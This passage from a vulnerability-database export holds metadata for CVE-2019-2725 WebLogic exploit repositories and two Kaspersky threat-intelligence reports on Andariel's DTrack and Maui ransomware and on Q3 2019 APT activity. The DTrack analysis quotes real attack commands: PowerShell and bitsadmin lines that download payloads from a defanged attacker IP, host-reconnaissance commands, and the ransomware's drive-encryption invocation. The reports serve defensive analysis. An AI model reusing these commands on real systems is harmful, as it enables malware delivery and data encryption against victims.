"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-08T06:35:28", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-01-03T07:44:53", "id": "D2931851-B196-5CD6-AF75-B24EA22F6115", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-27T22:44:16", "description": "# CVE-2019-2725\n# weblogic\u547d\u4ee4\u56de\u663e+webshell\u4e0a\u4f20<br/>\n**\u514d\u8d23\u58f0\u660e:\u672c\u5de5\u5177\u4ec5\u4f9b\u5b89\u5168\u6d4b\u8bd5\u5b66...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-11T00:49:56", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2021-01-02T15:56:01", "id": "9D09C8C3-35C2-51CD-B6E1-6542183770EF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-27T22:44:30", "description": "# cve-2019-2725\n\nReferences:\n\nTenable - https://www.tenable.com/...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-06T19:27:09", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2019-06-06T19:27:29", "id": "F0C27A65-B942-5D87-B7D9-08451A15456C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T16:46:04", "description": "# CVE-2019-2725 bypass\n\n## tips\ncoded in python3,payload[here](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-16T06:17:09", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2020-03-17T08:04:13", "id": "EEB220AD-2CB0-50FB-A3B9-A87BBC32BA19", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T03:59:32", "description": "```\nweblogic CVE-2019-2725 CVE-2019...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-24T08:33:07", "type": "githubexploit", "title": "Exploit for Injection in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729"], "modified": "2022-03-23T01:26:21", "id": "4F4AF4AC-0953-5098-98D6-592B918B0836", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "securelist": [{"lastseen": "2022-08-09T15:51:11", "description": "\n\nOn July 7, 2022, the CISA published an alert, entitled, &quot;[North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector](<https://www.cisa.gov/uscert/ncas/alerts/aa22-187a>),&quot; related to a Stairwell report, &quot;[Maui Ransomware](<https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf>).&quot; Later, the Department of Justice [announced](<https://www.justice.gov/opa/speech/deputy-attorney-general-lisa-o-monaco-delivers-keynote-address-international-conference>) that they had effectively [clawed back $500,000](<https://www.bankinfosecurity.com/fbi-claws-back-cryptocurrency-ransoms-paid-to-north-koreans-a-19621>) in ransom payments to the group, partly thanks to new legislation. We can confirm a Maui ransomware incident in 2022, and add some incident and attribution findings.\n\nWe extend their &quot;first seen&quot; date from the reported May 2021 to April 15th 2021, and the geolocation of the target, to Japan. Because the malware in this early incident was compiled on April 15th, 2021, and compilation dates are the same for all known samples, this incident is possibly the first ever involving the Maui ransomware.\n\nWhile CISA provides no useful information in its report to attribute the ransomware to a North Korean actor, we determined that approximately ten hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the target, preceded by 3proxy months earlier. This data point, along with others, should openly help solidify the attribution to the Korean-speaking APT Andariel, also known as Silent Chollima and Stonefly, with low to medium confidence.\n\n## Background\n\nWe observed the following timeline of detections from an initial target system:\n\n 1. 2020-12-25 Suspicious 3proxy tool\n 2. 2021-04-15 DTrack malware\n 3. 2021-04-15 Maui ransomware\n\n## DTrack malware\n\nMD5 | 739812e2ae1327a94e441719b885bd19 \n---|--- \nSHA1 | 102a6954a16e80de814bee7ae2b893f1fa196613 \nSHA256 | 6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67 \nLink time | 2021-03-30 02:29:15 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 1.2 MB \nFile name | C:\\Windows\\Temp\\temp\\mvhost.exe \n \nOnce this malware is spawned, it executes an embedded shellcode, loading a final Windows in-memory payload. This malware is responsible for collecting victim information and sending it to the remote host. Its functionality is almost identical to previous DTrack modules. This malware collects information about the infected host via Windows commands. The in-memory payload executes the following Windows commands:\n \n \n \"C:\\Windows\\system32\\cmd.exe\" /c ipconfig /all > \"%Temp%\\temp\\res.ip\"\n \"C:\\Windows\\system32\\cmd.exe\" /c tasklist > \"%Temp%\\temp\\task.list\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netstat -naop tcp > \"%Temp%\\temp\\netstat.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netsh interface show interface >\n \"%Temp%\\temp\\netsh.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c ping -n 1 8.8.8.8 > \"%Temp%\\temp\\ping.res\"\n\nIn addition, the malware collects browser history data, saving it to the browser.his file, just as the older variant did. Compared to the old version of DTrack, the new information-gathering module sends stolen information to a remote server over HTTP, and this variant copies stolen files to the remote host on the same network.\n\n## Maui ransomware\n\nThe Maui ransomware was detected ten hours after the DTrack variant on the same server.\n\nMD5 | ad4eababfe125110299e5a24be84472e \n---|--- \nSHA1 | 94db86c214f4ab401e84ad26bb0c9c246059daff \nSHA256 | a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa \nLink time | 2021-04-15 04:36:00 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 763.67 KB \nFile name | C:\\Windows\\Temp\\temp\\maui.exe \n \nMultiple run parameters exist for the Maui ransomware. In this incident, we observe the actors using &quot;-t&quot; and &quot;\\- x&quot; arguments, along with a specific drive path to encrypt:\n \n \n C:\\Windows\\Temp\\temp\\bin\\Maui.exe -t 8 -x E:\n\nIn this case, &quot;-t 8&quot; sets the ransomware thread count to eight, &quot;-x&quot; commands the malware to &quot;self melt&quot;, and the &quot;E:&quot; value sets the path (the entire drive in this case) to be encrypted. The ransomware functionality is the same as described in the Stairwell report.\n\nThe malware created two key files to implement file encryption:\n\nRSA private key | C:\\Windows\\Temp\\temp\\bin\\Maui.evd \n---|--- \nRSA public key | C:\\Windows\\Temp\\temp\\bin\\Maui.key \n \n## Similar DTrack malware on different victims\n\nPivoting on the exfiltration information to the adjacent hosts, we discovered additional victims in India. One of these hosts was initially compromised in February 2021. In all likelihood, Andariel stole elevated credentials to deploy this malware within the target organization, but this speculation is based on paths and other artifacts, and we do not have any further details.\n\nMD5 | f2f787868a3064407d79173ac5fc0864 \n---|--- \nSHA1 | 1c4aa2cbe83546892c98508cad9da592089ef777 \nSHA256 | 92adc5ea29491d9245876ba0b2957393633c9998eb47b3ae1344c13a44cd59ae \nLink time | 2021-02-22 05:36:16 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 848 KB \n \nThe primary objective of this malware is the same as in the case of the aforementioned victim in Japan, using different login credentials and local IP address to exfiltrate data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144620/Andariel_Deploys_DTrack_and_Maui_Ransomware_01.png>)\n\n**_Windows commands to exfiltrate data_**\n\nFrom the same victim, we discovered additional DTrack malware (MD5 87e3fc08c01841999a8ad8fe25f12fe4) using different login credentials.\n\n## Additional DTrack module and initial infection method\n\nThe [&quot;3Proxy&quot; tool](<https://3proxy.ru/>), likely utilized by the threat actor, was compiled on 2020-09-09 and deployed to the victim on 2020-12-25. Based on this detection and compilation date, we expanded our research scope and discovered an additional DTrack module. This module was compiled 2020-09-16 14:16:21 and detected in early December 2020, having a similar timeline to the 3Proxy tool deployment.\n\nMD5 | cf236bf5b41d26967b1ce04ebbdb4041 \n---|--- \nSHA1 | feb79a5a2bdf0bcf0777ee51782dc50d2901bb91 \nSHA256 | 60425a4d5ee04c8ae09bfe28ca33bf9e76a43f69548b2704956d0875a0f25145 \nLink time | 2020-09-16 14:16:21 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 136 KB \nFile name | %appdata%\\microsoft\\mmc\\dwem.cert \n \nThis DTrack module is very similar to the EventTracKer module of DTrack, which was previously reported to our Threat Intelligence customers. In one victim system, we discovered that a well-known simple HTTP server, [HFS7](<https://www.rejetto.com/hfs/>), had deployed the malware above. After an unknown exploit was used on a vulnerable HFS server and &quot;whoami&quot; was executed, the Powershell command below was executed to fetch an additional Powershell script from the remote server:\n \n \n C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe IEX (New-Object Net.WebClient).DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1')\n\nThe mini.ps1 script is responsible for downloading and executing the above DTrack malware via bitsadmin.exe:\n \n \n bitsadmin.exe /transfer myJob /download /priority high\n \"hxxp://145.232.235[.]222/usr/users/dwem.cert\" \"%appdata%\\microsoft\\mmc\\dwem.cert\"\n\nThe other victim operated a vulnerable Weblogic server. According to our telemetry, the actor compromised this server via the CVE-2017-10271 exploit. We saw Andariel abuse identical exploits and compromise WebLogic servers in mid-2019, and previously reported this activity to our Threat Intelligence customers. In this case, the exploited server executes the Powershell command to fetch the additional script. The fetched script is capable of downloading a Powershell script from the server we mentioned above (hxxp://145.232.235[.]222/usr/users/mini.ps1). Therefore, we can summarize that the actor abused vulnerable Internet-facing services to deploy their malware at least until the end of 2020.\n\n## Victims\n\nThe July 2022 CISA alert noted that the healthcare and public health sectors had been targeted with the Maui ransomware within the US. However, based on our research, we believe this operation does not target specific industries and that its reach is global. We can confirm that the Japanese housing company was targeted with the Maui ransomware on April 15, 2021. Also, victims from India, Vietnam, and Russia were infected within a similar timeframe by the same DTrack malware as used in the Japanese Maui incident: from the end of 2020 to early 2021.\n\nOur research suggests that the actor is rather opportunistic and could compromise any company around the world, regardless of their line of business, as long as it enjoys good financial standing. It is probable that the actor favors vulnerable Internet-exposed web services. Additionally, the [Andariel deployed ransomware](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) selectively to make financial profits.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144725/Andariel_Deploys_DTrack_and_Maui_Ransomware_02.png>)\n\n## Attribution\n\nAccording to the Kaspersky Threat Attribution Engine (KTAE), the DTrack malware from the victim contains a high degree of code similarity (84%) with previously known DTrack malware.\n\nAlso, we discovered that the DTrack malware (MD5 739812e2ae1327a94e441719b885bd19) employs the same shellcode loader as &quot;Backdoor.Preft&quot; malware (MD5 2f553cba839ca4dab201d3f8154bae2a), [published/reported by Symantec](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/stonefly-north-korea-espionage>) - note that Symantec recently described the Backdoor.Preft malware as &quot;aka Dtrack, Valefor&quot;. Apart from the code similarity, the actor used 3Proxy tool (MD5 5bc4b606f4c0f8cd2e6787ae049bf5bb), and that tool was also previously employed by the Andariel/StoneFly/Silent Chollima group (MD5 95247511a611ba3d8581c7c6b8b1a38a). Symantec attributes StoneFly as the North Korean-linked actor behind the DarkSeoul incident.\n\n## Conclusions\n\nBased on the modus operandi of this attack, we conclude that the actor&#x27;s TTPs behind the Maui ransomware incident is remarkably similar to past Andariel/Stonefly/Silent Chollima activity:\n\n * Using legitimate proxy and tunneling tools after initial infection or deploying them to maintain access, and using Powershell scripts and Bitsadmin to download additional malware;\n * Using exploits to target known but unpatched vulnerable public services, such as WebLogic and HFS;\n * Exclusively deploying DTrack, also known as Preft;\n * Dwell time within target networks can last for months prior to activity;\n * Deploying ransomware on a global scale, demonstrating ongoing financial motivations and scale of interest", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-09T10:00:46", "type": "securelist", "title": "Andariel deploys DTrack and Maui ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2022-08-09T10:00:46", "id": "SECURELIST:B61F1A3C7FBA17501CE779F4E076EB79", "href": "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-10-16T11:39:54", "description": "\n\nFor more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2019.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.\n\n## **The most remarkable findings**\n\nOn August 30, Ian Beer from Google's Project Zero team published an extensive analysis of at least 14 iOS zero-days found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. Although the use of watering-hole attacks was popular in the early 2010s, it has now become less common. According to Google, a number of waterholed websites were delivering the exploits, possibly as far back as three years ago (based on September 2016 usage of the first exploit chain). While the blog contains no details about the compromised sites or if they are still active, it claims that these websites receive \"thousands of visitors per week\". The first stage Webkit exploit used to infect visitors makes no discrimination other than that the victim uses an iPhone and browses the website with Safari, although the vulnerability would also have worked in other browsers such as Chrome. The lack of victim discrimination would point to a relatively non-targeted attack, but the not-so-high estimate of the number of visitors to the waterholed sites seems to indicate that the attack was targeted at some communities: it is likely that these waterholed sites were all dedicated to some common topic. The blog does not contains many details regarding who the actor behind this attack is, but the high technical capabilities needed to deliver and install this malware, and keep the exploitation chains up-to-date for more than two years, shows a high level of resources and dedication. Upon infection, the malware itself will be invisible to the victim. It pings its C2 every 60 seconds for new commands. It is able to get access to all kinds of files in the system, as well as tracking GPS position. There is no mechanism to survive a reboot, but the capability to steal signing-in cookies from a victim's account can keep providing the attackers with access to this data.\n\nShortly after the Google blogpost, Volexity published more details about the waterholing websites used in the attack to distribute the malware, pointing to a \"strategic web compromise targeting Uyghurs\". Citizen Lab published the Android counterpart for this story, stating that between November 2018 and May 2019, senior members of Tibetan groups were targeted by the same actor (this time dubbed POISON CARP by Citizen Lab) using malicious links in WhatsApp text exchanges, with the attackers posing as NGO workers, journalists and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages.\n\nAt the beginning of September 2019, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS: the exploit broker is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company's previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium [has also reduced payouts](<https://threatpost.com/android-zero-days-worth-more-iphone-exploits/147981/>) for Apple one-click exploits. On the same day, a high-severity zero-day was found in the v412 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, [was not included](<https://threatpost.com/android-zero-day-bug-opens-door-to-privilege-escalation-attack-researchers-warn/148014/>) in Google's September security update. A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to [gain full access](<https://www.independent.co.uk/life-style/gadgets-and-tech/news/android-security-flaw-hack-samsung-huawei-phone-text-message-sms-a9093111.html>) to emails on a compromised device using an SMS message.\n\n## **Russian-speaking activity**\n\nTurla (aka Venomous Bear, Uroburos and Waterbug) has made significant changes to its toolset. While investigating malicious activity in Central Asia, we identified a new backdoor that we attribute with medium confidence to this APT group. The malware, named Tunnus, is a.NET-based backdoor with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the C2 infrastructure has been built using compromised sites with vulnerable WordPress installations. According to our telemetry, Tunnus activity started in March and was still active when we published our private report in July.\n\nTurla has also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new.NET file that the group is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. Some of the changes are to help Turla evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. The malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. Two KopiLuwak analogues \u2013 the.NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 are used for cyber-espionage. We think that the threat actor deploys these versions where their targets are protected with security software capable of detecting KopiLuwak. All three implants can fingerprint targets, gather information on system and network adapters, steal files and download and execute additional malware. MiamiBeach is also able to take screenshots.\n\nIn September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file sharing site. In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.\n\n## **Chinese-speaking activity**\n\nHoneyMyte (aka Temp.Hex and Mustang Panda), which has been active for several years, has adopted different techniques to perform its attacks over the past couple of years, and has focused on various targeting profiles. In previous attacks, conducted from mid-2018, this threat actor deployed PlugX implants, as well as multi-stage PowerShell scripts resembling CobaltStrike. That campaign targeted government entities in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh. We recently described a new set of activities from HoneyMyte involving attacks that relied on several types of tools. They include: (a) PlugX implants; (b) a multi-stage package resembling the CobaltStrike stager and stageless droppers with PowerShell and VB scripts,.NET executables, cookie-stealers and more; (c) ARP poisoning with DNS hijacking malware, to deliver poisoned Flash and Microsoft updates over http for lateral movement; (d) various system and network utilities. Based on the targeting of government organizations related to natural resource management in Myanmar and a major continental organization in Africa, we assess that one of the main motivations of HoneyMyte is gathering geo-political and economic intelligence. While a military organization was targeted in\n\nBangladesh, it's possible that the individual targets were related to geopolitical activity in the region.\n\nSince the beginning of 2019, we have observed a spike in LuckyMouse activity, both in Central Asia and the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. LuckyMouse hasn't changed any of its TTPs (Tactics, Techniques and Procedures), continuing to rely on its own tools to get a foothold in the victim's network. The new campaigns consist of HTTPBrowser as a first stage, followed by the Soldier Trojan as a second-stage implant. The attackers made a change to their infrastructure, as they seem to solely rely on IPv4 addresses instead of domain names for their C2s, which can be seen as an attempt by them to limit correlation. The campaigns from this actor were still active at the time we published our latest private report on LuckyMouse in September.\n\nOur January 2018 private report 'ShaggyPanther \u2013 Chinese-speaking cluster of activity in APAC' introduced ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia. Related components and activity span back over a decade, with similar code maintaining compilation timestamps as far back as 2004. Since then ShaggyPanther activity has been detected in several more locations: the most recent detections occurred on servers in Indonesia in July, and, somewhat surprisingly, in Syria in March. The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChoper/ChinaChopper, a commonly used webshell shared across multiple Chinese-speaking actors. SinoChopper is not only used to perform host identification and backdoor delivery but also email archive theft and additional activity. Though not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019 we observed ShaggyPanther targeting Windows servers.\n\n## **Middle East**\n\nOn August 1, Dragos published an overview of attacks called 'Oil and Gas Threat Perspective Summary', which references an alleged new threat actor they call Hexane. According to the report, \"HEXANE targets oil and gas and telecommunications in Africa, the Middle East, and Southwest Asia\". Dragos claims to have identified the group in May 2019, associating it with OilRig and CHRYSENE. Although no IoCs have been made publicly available, some researchers have shared hashes in a Twitter thread in response to the Dragos announcement. Our analysis reveals some low-confidence similarities with OilRig based on TTPs, which is something that Dragos also mentions in its research. If this is indeed the case, the recent leaks from Lab Dookhtegan and GreenLeakers offer several hypotheses about this group's emergence. Due to exposure and leaks, OilRig may simply have changed its toolset and continued to operate as usual: this would imply a quick and flexible response to the leaks from this actor. Or perhaps some of the OilRig TTPs were adopted by a new group that seems to have similar interests. Hexane's activity appears to have started around September 2018 with a second wave of activity starting in May 2019. In all cases, the artefacts used in the attacks are relatively unsophisticated. The constant evolution of the droppers seems to indicate a trial-and-error period where attackers were testing how best to evade detection. The TTPs we can link to previous OilRig activity include the described trial-and-error process, the use of simplistic unsophisticated droppers distributed through spear phishing and DNS-based C2 exfiltration.\n\nTortoiseShell is a new cluster of activities associated with an unknown APT actor, revealed by Symantec on September 18, 2019. Symantec claims that the first signs of activity were seen in July 2018, and are still active one year later; Kaspersky has seen different TortoiseShell artifacts dating back to January 2018. To date, all registered attacks, according to our telemetry, are in Saudi Arabia. Symantec's report also confirms that the majority of the infections they found were in the same location. The attackers deploy their Syskit backdoor and then use it for reconnaissance. Other tools deployed on the victim machines are designed to collect files and pack them using RAR, gathering further system information. In one case, the attackers deployed the TightVNC remote administration tool to obtain full access to a machine. Symantec mentions traces of OilRig tools in some of the victims, something which we cannot confirm. Also, they mention in their blogpost the possibility that this was distributed through a supply chain attack. We were able to see the malware being distributed through a fake application distributed from a specifically created website for war veterans around two months before the publication of our report. The website was activated shortly after we published our report during a national holiday period in Saudi Arabia. However, we didn't find any compromised application that could suggest a supply chain attack.\n\n## **Southeast Asia and the Korean Peninsula**\n\nRecently we discovered new Android malware disguised as a mobile messenger or as cryptocurrency-related applications. The new malware has several connections with KONNI, a Windows malware strain that has been used in the past to target a human rights organization and an individual/organization with an interest in Korean Peninsula affairs. KONNI has also previously targeted cryptocurrencies. The infected apps don't steal cryptocurrencies from a specific trading application or switch wallet addresses; they implement full-featured functionalities to control an infected Android device and steal personal cryptocurrency using these features. We worked closely with a local CERT in order to take down the attacker's server, giving us a chance to investigate it.\n\nWe recently tracked new BlueNoroff activity. In particular, we identified a bank in Myanmar that was compromised by this actor and promptly contacted it to share the IoCs we had found. This collaboration allowed us to obtain valuable information on how the attackers move laterally to access high value hosts, such as those owned by the bank's system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.\n\nKaspersky observed a recent campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and has undergone constant development since then. We have only observed this malware being used in a small number of active campaigns since January, all targeting government, military, and diplomatic entities in the Southeast Asia region. The latest campaign was conducted on August 29 and seems to have targeted only a select few individuals working for a military organization.\n\nThe Andariel APT group, considered to be a sub-group of Lazarus, was initially described by the South Korean Financial Security Institute (FSI) in 2017. This threat actor has traditionally focused on geopolitical espionage and financial intelligence in South Korea. We have released several private intelligence reports on the group. We recently observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. Thanks to the quick response of the South Korean CERT, this signature was soon revoked. The malware is a brand new type of backdoor, called ApolloZeus, started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign. Indeed, we believe this attack is an early preparation stage for a new campaign, which also points to the attacker's intentions to replace their malware framework with the newly discovered artifacts.\n\n## **Other interesting discoveries**\n\nThe well-known Shadow Brokers leak Lost in Translation included an interesting Python script \u2013sigs.py \u2013 that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system, for example, a file with a unique name or registry path. Although some checks are empty, 44 entries are listed in sigs.py, many of them related to unknown APTs that have not yet been 